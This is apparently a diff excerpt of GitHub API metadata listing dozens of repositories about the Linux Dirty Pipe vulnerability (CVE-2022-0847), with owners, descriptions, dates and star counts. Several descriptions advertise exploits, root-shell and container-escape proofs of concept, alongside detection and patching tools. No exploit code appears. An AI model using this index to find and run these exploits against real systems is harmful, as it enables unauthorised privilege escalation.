"https:\/\/avatars.githubusercontent.com\/u\/95272899?v=4", + "html_url": "https:\/\/github.com\/sa-infinity8888", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sa-infinity8888\/Dirty-Pipe-CVE-2022-0847", + "description": "CVE-2022-0847 (Dirty Pipe) is an arbitrary file overwrite vulnerability that allows escalation of privileges by modifying or overwriting arbitrary read-only files e.g. \/etc\/passwd, \/etc\/shadow.", + "fork": false, + "created_at": "2022-03-13T05:51:06Z", + "updated_at": "2024-08-12T20:21:30Z", + "pushed_at": "2022-03-13T06:02:30Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-0847", + "cybersecurity", + "dirtypipe" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 469473653, + "name": "dirtypipetester", + "full_name": "realbatuhan\/dirtypipetester", + "owner": { + "login": "realbatuhan", + "id": 68564239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68564239?v=4", + "html_url": "https:\/\/github.com\/realbatuhan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/realbatuhan\/dirtypipetester", + "description": "Dirty Pipe (CVE-2022-0847) zafiyeti kontrolü ", + "fork": false, + "created_at": "2022-03-13T19:30:14Z", + "updated_at": "2022-03-14T05:00:16Z", + "pushed_at": "2022-03-13T19:49:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 469743112, + "name": "CVE-2022-0847-POC", + "full_name": "CYB3RK1D\/CVE-2022-0847-POC", + "owner": { + "login": "CYB3RK1D", + "id": 37270599, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37270599?v=4", + "html_url": "https:\/\/github.com\/CYB3RK1D", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CYB3RK1D\/CVE-2022-0847-POC", + "description": "dirtypipe", + "fork": false, + "created_at": "2022-03-14T13:21:25Z", + "updated_at": "2022-03-17T15:54:57Z", + "pushed_at": "2022-03-15T17:41:13Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 469794565, + "name": "dirty-pipe-poc", + "full_name": "breachnix\/dirty-pipe-poc", + "owner": { + "login": "breachnix", + "id": 84611050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84611050?v=4", + "html_url": "https:\/\/github.com\/breachnix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/breachnix\/dirty-pipe-poc", + "description": "CVE-2022-0847 POC", + "fork": false, + "created_at": "2022-03-14T15:32:25Z", + "updated_at": "2024-08-12T20:21:33Z", + "pushed_at": "2022-03-14T20:34:57Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 15, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 469930369, + "name": "cve_2022_0847_shellcode", + "full_name": "Shotokhan\/cve_2022_0847_shellcode", + "owner": { + "login": "Shotokhan", + "id": 52707252, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52707252?v=4", + "html_url": "https:\/\/github.com\/Shotokhan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shotokhan\/cve_2022_0847_shellcode", + "description": "Implementation of CVE-2022-0847 as a shellcode", + "fork": false, + "created_at": "2022-03-14T22:54:15Z", + "updated_at": "2024-08-12T20:21:33Z", + "pushed_at": "2022-03-14T23:05:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-0847", + "dirty-pipe", + "kernel", + "shellcode" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 470069674, + "name": "DirtyPIPE-CVE-2022-0847", + "full_name": "githublihaha\/DirtyPIPE-CVE-2022-0847", + "owner": { + "login": "githublihaha", + "id": 43808858, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43808858?v=4", + "html_url": "https:\/\/github.com\/githublihaha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/githublihaha\/DirtyPIPE-CVE-2022-0847", + "description": null, + "fork": false, + "created_at": "2022-03-15T08:33:19Z", + "updated_at": "2022-03-15T08:34:07Z", + "pushed_at": "2022-03-15T08:55:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 470128338, + "name": "CVE-2022-0847-dirty-pipe-kernel-checker", + "full_name": "MrP1xel\/CVE-2022-0847-dirty-pipe-kernel-checker", + "owner": { + "login": "MrP1xel", + "id": 16755572, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16755572?v=4", + "html_url": "https:\/\/github.com\/MrP1xel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrP1xel\/CVE-2022-0847-dirty-pipe-kernel-checker", + "description": "Python script to check if your kernel is vulnerable to Dirty pipe CVE-2022-0847", + "fork": false, + "created_at": "2022-03-15T11:25:19Z", + "updated_at": "2023-07-19T19:19:14Z", + "pushed_at": "2022-03-15T11:30:58Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 470139953, + "name": "CVE-2022-0847-DirtyPipe-Container-Breakout", + "full_name": "jpts\/CVE-2022-0847-DirtyPipe-Container-Breakout", + "owner": { + "login": "jpts", + "id": 5352661, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5352661?v=4", + "html_url": "https:\/\/github.com\/jpts", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jpts\/CVE-2022-0847-DirtyPipe-Container-Breakout", + "description": "PoC Container Breakout for DirtyPipe Vulnerability CVE-2022-0847 ", + "fork": false, + "created_at": "2022-03-15T12:00:17Z", + "updated_at": "2022-12-02T03:11:16Z", + "pushed_at": "2022-04-20T22:07:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "breakout", + "container", + "cve-2022-0847", + "dirtypipe", + "docker" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 471537771, + "name": "CVE-2022-0847_dirty-pipe", + "full_name": "LudovicPatho\/CVE-2022-0847_dirty-pipe", + "owner": { + "login": "LudovicPatho", + "id": 26960886, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26960886?v=4", + "html_url": "https:\/\/github.com\/LudovicPatho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LudovicPatho\/CVE-2022-0847_dirty-pipe", + "description": "Hacked up Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn a root shell. (and attempts to restore the damaged binary as well)", + "fork": false, + "created_at": "2022-03-18T22:51:02Z", + "updated_at": "2024-04-04T11:34:01Z", + "pushed_at": "2022-04-05T20:33:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 472123951, + "name": "pwncat_dirtypipe", + "full_name": "DanaEpp\/pwncat_dirtypipe", + "owner": { + "login": "DanaEpp", + "id": 11337016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11337016?v=4", + "html_url": "https:\/\/github.com\/DanaEpp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DanaEpp\/pwncat_dirtypipe", + "description": "pwncat module that automatically exploits CVE-2022-0847 (dirtypipe)", + "fork": false, + "created_at": "2022-03-20T23:02:43Z", + "updated_at": "2022-10-17T04:59:19Z", + "pushed_at": "2022-03-21T19:28:18Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 472598995, + "name": "CVE-2022-0847", + "full_name": "tmoneypenny\/CVE-2022-0847", + "owner": { + "login": "tmoneypenny", + "id": 4460992, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4460992?v=4", + "html_url": "https:\/\/github.com\/tmoneypenny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tmoneypenny\/CVE-2022-0847", + "description": "Dirty Pipe - CVE-2022-0847", + "fork": false, + "created_at": "2022-03-22T03:17:51Z", + "updated_at": "2023-01-24T04:53:25Z", + "pushed_at": "2022-12-19T06:10:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 476289719, + "name": "dirty-pipe", + "full_name": "scopion\/dirty-pipe", + "owner": { + "login": "scopion", + "id": 27413591, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27413591?v=4", + "html_url": "https:\/\/github.com\/scopion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scopion\/dirty-pipe", + "description": "Exploit for Dirty-Pipe (CVE-2022-0847) ", + "fork": false, + "created_at": "2022-03-31T12:10:52Z", + "updated_at": "2023-06-19T02:24:44Z", + "pushed_at": "2022-03-31T11:48:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 476590347, + "name": "Debugging_Dirty_Pipe_CVE-2022-0847", + "full_name": "stfnw\/Debugging_Dirty_Pipe_CVE-2022-0847", + "owner": { + "login": "stfnw", + "id": 28357058, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28357058?v=4", + "html_url": "https:\/\/github.com\/stfnw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stfnw\/Debugging_Dirty_Pipe_CVE-2022-0847", + "description": "Presentation slides and supplementary material", + "fork": false, + "created_at": "2022-04-01T05:51:27Z", + "updated_at": "2022-04-01T06:08:57Z", + "pushed_at": "2022-04-01T05:53:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 477067906, + "name": "dirtypipe", + "full_name": "drapl0n\/dirtypipe", + "owner": { + "login": "drapl0n", + "id": 87269662, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87269662?v=4", + "html_url": "https:\/\/github.com\/drapl0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/drapl0n\/dirtypipe", + "description": "DirtyPipe: Exploit for a new Linux vulnerability known as 'Dirty Pipe(CVE-2022-0847)' allows local users to gain root privileges. The vulnerability is tracked as CVE-2022-0847 and allows a non-privileged user to inject and overwrite data in read-only files, including SUID processes that run as root.", + "fork": false, + "created_at": "2022-04-02T13:49:03Z", + "updated_at": "2024-08-12T20:22:05Z", + "pushed_at": "2022-04-02T13:50:21Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bash-bunny", + "cve-2022-0847", + "hak5", + "payload" + ], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 478388812, + "name": "dirtypipe", + "full_name": "mhanief\/dirtypipe", + "owner": { + "login": "mhanief", + "id": 47133144, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47133144?v=4", + "html_url": "https:\/\/github.com\/mhanief", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mhanief\/dirtypipe", + "description": "Dirty Pipe Vulnerability Detection Script - RHSB-2022-002 Dirty Pipe - kernel arbitrary file manipulation - (CVE-2022-0847) ", + "fork": false, + "created_at": "2022-04-06T03:29:03Z", + "updated_at": "2024-08-12T20:22:10Z", + "pushed_at": "2022-04-06T03:32:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 481902704, + "name": "CVE-2022-0847-L-nux-PrivEsc", + "full_name": "tufanturhan\/CVE-2022-0847-L-nux-PrivEsc", + "owner": { + "login": "tufanturhan", + "id": 49189594, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49189594?v=4", + "html_url": "https:\/\/github.com\/tufanturhan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tufanturhan\/CVE-2022-0847-L-nux-PrivEsc", + "description": null, + "fork": false, + "created_at": "2022-04-15T09:11:43Z", + "updated_at": "2022-04-15T09:11:54Z", + "pushed_at": "2022-04-15T09:11:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 482426042, + "name": "linux-privilege-escalation", + "full_name": "rexpository\/linux-privilege-escalation", + "owner": { + "login": "rexpository", + "id": 30176934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30176934?v=4", + "html_url": "https:\/\/github.com\/rexpository", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rexpository\/linux-privilege-escalation", + "description": "Scripted Linux Privilege Escalation for the CVE-2022-0847 \"Dirty Pipe\" vulnerability", + "fork": false, + "created_at": "2022-04-17T04:28:24Z", + "updated_at": "2024-08-12T20:22:29Z", + "pushed_at": "2022-04-18T10:20:32Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-3560", + "cve-2022-0847", + "dirtypipe", + "exploit", + "privilege-escalation" + ], + "visibility": "public", + "forks": 9, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 485209824, + "name": "CVE-2022-0847", + "full_name": "CPT-Jack-A-Castle\/CVE-2022-0847", + "owner": { + "login": "CPT-Jack-A-Castle", + "id": 75252027, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75252027?v=4", + "html_url": "https:\/\/github.com\/CPT-Jack-A-Castle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CPT-Jack-A-Castle\/CVE-2022-0847", + "description": "This is the story of CVE-2022-0847, a vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files. This leads to privilege escalation because unprivileged processes can inject code into root processes.", + "fork": false, + "created_at": "2022-04-25T03:27:02Z", + "updated_at": "2022-03-08T13:22:07Z", + "pushed_at": "2022-04-25T03:27:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 490045854, + "name": "COMP3320-VAPT", + "full_name": "isaiahsimeone\/COMP3320-VAPT", + "owner": { + "login": "isaiahsimeone", + "id": 18187641, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18187641?v=4", + "html_url": "https:\/\/github.com\/isaiahsimeone", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/isaiahsimeone\/COMP3320-VAPT", + "description": "Files required to demonstrate CVE-2022-0847 vulnerability in Linux Kernel v5.8", + "fork": false, + "created_at": "2022-05-08T20:17:08Z", + "updated_at": "2023-11-15T07:06:49Z", + "pushed_at": "2022-05-10T09:52:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 493093053, + "name": "DirtyPipe-CVE-2022-0847", + "full_name": "VinuKalana\/DirtyPipe-CVE-2022-0847", + "owner": { + "login": "VinuKalana", + "id": 87648107, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87648107?v=4", + "html_url": "https:\/\/github.com\/VinuKalana", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VinuKalana\/DirtyPipe-CVE-2022-0847", + "description": "This repository is developed to analysis and understand DirtyPipe exploit CVE-2022-0847", + "fork": false, + "created_at": "2022-05-17T04:23:34Z", + "updated_at": "2024-08-12T20:23:19Z", + "pushed_at": "2022-06-02T11:04:25Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 494818180, + "name": "debian11-dirty_pipe-patcher", + "full_name": "ih3na\/debian11-dirty_pipe-patcher", + "owner": { + "login": "ih3na", + "id": 66982318, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66982318?v=4", + "html_url": "https:\/\/github.com\/ih3na", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ih3na\/debian11-dirty_pipe-patcher", + "description": "A Simple bash script that patches the CVE-2022-0847 (dirty pipe) kernel vulnerability on Debian 11", + "fork": false, + "created_at": "2022-05-21T15:14:51Z", + "updated_at": "2024-04-18T06:38:49Z", + "pushed_at": "2023-06-21T15:24:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499769031, + "name": "CVE-2022-0847-Container-Escape", + "full_name": "greenhandatsjtu\/CVE-2022-0847-Container-Escape", + "owner": { + "login": "greenhandatsjtu", + "id": 40566803, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40566803?v=4", + "html_url": "https:\/\/github.com\/greenhandatsjtu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/greenhandatsjtu\/CVE-2022-0847-Container-Escape", + "description": "CVE-2022-0847 used to achieve container escape 利用CVE-2022-0847 (Dirty Pipe) 实现容器逃逸", + "fork": false, + "created_at": "2022-06-04T08:31:32Z", + "updated_at": "2024-08-17T10:29:15Z", + "pushed_at": "2022-06-16T17:14:10Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "container-breakout", + "container-escape", + "cve-2022-0847", + "dirtypipe", + "exploit", + "kernel-vulnerability", + "poc" + ], + "visibility": "public", + "forks": 7, + "watchers": 30, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 508905276, + "name": "CVE-2022-0847-DirtyPipe-Exploits", + "full_name": "jxpsx\/CVE-2022-0847-DirtyPipe-Exploits", + "owner": { + "login": "jxpsx", + "id": 41709132, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41709132?v=4", + "html_url": "https:\/\/github.com\/jxpsx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jxpsx\/CVE-2022-0847-DirtyPipe-Exploits", + "description": "A collection of exploits and documentation that can be used to exploit the Linux Dirty Pipe vulnerability.", + "fork": false, + "created_at": "2022-06-30T02:19:25Z", + "updated_at": "2022-06-30T02:19:17Z", + "pushed_at": "2022-06-29T12:05:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 509084736, + "name": "CBDS_CVE-2022-0847_POC", + "full_name": "Asbatel\/CBDS_CVE-2022-0847_POC", + "owner": { + "login": "Asbatel", + "id": 34680708, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34680708?v=4", + "html_url": "https:\/\/github.com\/Asbatel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Asbatel\/CBDS_CVE-2022-0847_POC", + "description": null, + "fork": false, + "created_at": "2022-06-30T13:07:55Z", + "updated_at": "2024-07-01T18:57:06Z", + "pushed_at": "2024-07-01T18:57:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 510629189, + "name": "dirtypipe-ebpf_detection", + "full_name": "airbus-cert\/dirtypipe-ebpf_detection", + "owner": { + "login": "airbus-cert", + "id": 26453405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26453405?v=4", + "html_url": "https:\/\/github.com\/airbus-cert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/airbus-cert\/dirtypipe-ebpf_detection", + "description": "An eBPF detection program for CVE-2022-0847", + "fork": false, + "created_at": "2022-07-05T07:20:59Z", + "updated_at": "2024-08-09T11:36:06Z", + "pushed_at": "2022-07-05T14:25:46Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 27, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 510867863, + "name": "Dirty-Pipe", + "full_name": "edr1412\/Dirty-Pipe", + "owner": { + "login": "edr1412", + "id": 40953911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40953911?v=4", + "html_url": "https:\/\/github.com\/edr1412", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/edr1412\/Dirty-Pipe", + "description": "exp of CVE-2022-0847", + "fork": false, + "created_at": "2022-07-05T19:22:50Z", + "updated_at": "2024-08-12T20:24:46Z", + "pushed_at": "2022-07-05T19:23:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 520138171, + "name": "CVE-2022-0847-DirtyPipe-Exploits", + "full_name": "eduquintanilha\/CVE-2022-0847-DirtyPipe-Exploits", + "owner": { + "login": "eduquintanilha", + "id": 14018253, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14018253?v=4", + "html_url": "https:\/\/github.com\/eduquintanilha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eduquintanilha\/CVE-2022-0847-DirtyPipe-Exploits", + "description": "COMPILED", + "fork": false, + "created_at": "2022-08-01T14:14:40Z", + "updated_at": "2022-08-02T13:18:25Z", + "pushed_at": "2022-08-02T15:11:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 524458017, + "name": "CVE-2022-0847", + "full_name": "EagleTube\/CVE-2022-0847", + "owner": { + "login": "EagleTube", + "id": 87413459, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87413459?v=4", + "html_url": "https:\/\/github.com\/EagleTube", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EagleTube\/CVE-2022-0847", + "description": "Modified dirtypipe script into auto root without have to search a file manually to hijack suid binary.", + "fork": false, + "created_at": "2022-08-13T16:58:40Z", + "updated_at": "2023-01-11T09:18:06Z", + "pushed_at": "2022-08-14T07:48:51Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 526035445, + "name": "CVE-2022-0847-Container-Escape", + "full_name": "yoeelingBin\/CVE-2022-0847-Container-Escape", + "owner": { + "login": "yoeelingBin", + "id": 57822313, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57822313?v=4", + "html_url": "https:\/\/github.com\/yoeelingBin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yoeelingBin\/CVE-2022-0847-Container-Escape", + "description": "CVE-2022-0847 used to achieve container escape 利用CVE-2022-0847 (Dirty Pipe) 实现容器逃逸", + "fork": false, + "created_at": "2022-08-18T03:06:15Z", + "updated_at": "2024-03-12T02:21:27Z", + "pushed_at": "2022-08-22T03:37:04Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 531290655, + "name": "dpipe", + "full_name": "notl0cal\/dpipe", + "owner": { + "login": "notl0cal", + "id": 24575356, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24575356?v=4", + "html_url": "https:\/\/github.com\/notl0cal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/notl0cal\/dpipe", + "description": "Proof-of-concept exploit for the Dirty Pipe vulnerability (CVE-2022-0847)", + "fork": false, + "created_at": "2022-08-31T23:19:28Z", + "updated_at": "2022-08-31T23:24:51Z", + "pushed_at": "2022-08-31T23:25:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 535409119, + "name": "Dirty-Pipe-Exploits", + "full_name": "Gustavo-Nogueira\/Dirty-Pipe-Exploits", + "owner": { + "login": "Gustavo-Nogueira", + "id": 36088551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36088551?v=4", + "html_url": "https:\/\/github.com\/Gustavo-Nogueira", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Gustavo-Nogueira\/Dirty-Pipe-Exploits", + "description": "CVE-2022-0847(Dirty Pipe) vulnerability exploits.", + "fork": false, + "created_at": "2022-09-11T19:50:53Z", + "updated_at": "2022-12-01T05:36:55Z", + "pushed_at": "2022-09-26T14:06:13Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 549750916, + "name": "Dirty-Pipe-Oneshot", + "full_name": "b4dboy17\/Dirty-Pipe-Oneshot", + "owner": { + "login": "b4dboy17", + "id": 83988282, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83988282?v=4", + "html_url": "https:\/\/github.com\/b4dboy17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b4dboy17\/Dirty-Pipe-Oneshot", + "description": "Compled version of CVE-2022-0847 aka Dirty Pipe. Just one shot to root them all :D", + "fork": false, + "created_at": "2022-10-11T17:17:48Z", + "updated_at": "2022-10-12T05:02:04Z", + "pushed_at": "2022-10-11T17:42:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 550418551, + "name": "CVE-2022-0847-DirtyPipe-", + "full_name": "edsonjt81\/CVE-2022-0847-DirtyPipe-", + "owner": { + "login": "edsonjt81", + "id": 27496739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27496739?v=4", + "html_url": "https:\/\/github.com\/edsonjt81", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/edsonjt81\/CVE-2022-0847-DirtyPipe-", + "description": null, + "fork": false, + "created_at": "2022-10-12T18:26:55Z", + "updated_at": "2022-10-12T18:27:13Z", + 